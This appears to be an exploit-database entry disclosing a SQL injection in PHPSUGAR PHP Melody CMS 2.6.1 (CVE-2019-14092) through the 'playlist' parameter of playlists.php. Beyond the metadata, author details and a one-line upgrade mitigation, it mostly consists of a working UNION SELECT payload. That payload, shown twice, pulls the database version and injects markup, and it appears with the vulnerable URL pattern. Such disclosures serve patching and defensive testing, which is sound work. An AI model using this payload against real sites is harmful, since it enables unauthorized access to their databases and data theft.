header-logo
Suggest Exploit
vendor:
PHPSUGAR PHP Melody
by:
Venkat Rajgor
5,5
CVSS
MEDIUM
SQL injection
89
CWE
Product Name: PHPSUGAR PHP Melody
Affected Version From: 2.6.1
Affected Version To: 2.6.1
Patch Exists: YES
Related CWE: CVE-2019-14092
CPE: a:phpsugar:phpsugar_php_melody
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2019

PHPSUGAR PHP Melody 2.6.1 SQL Injection

In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php. Payload Used: ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -

Mitigation:

Upgrade to the latest version of PHPSUGAR PHP Melody CMS.
Source

Exploit-DB raw data:

###################################################
[+] Author : Venkat Rajgor
[+] Email : Venki9990@gmail.com
[+] Vulnerability : SQL injection
###################################################
E-mail ID : support@phpsugar.com
Download : http://www.phpsugar.com
Web : http://www.phpsugar.com
Price : $39 USD
###################################################
Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
Application : PHPSUGAR PHP Melody version 2.6.1
Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
###################################################

Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.

Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -

Navigation

Suggest Exploit

Services By CQR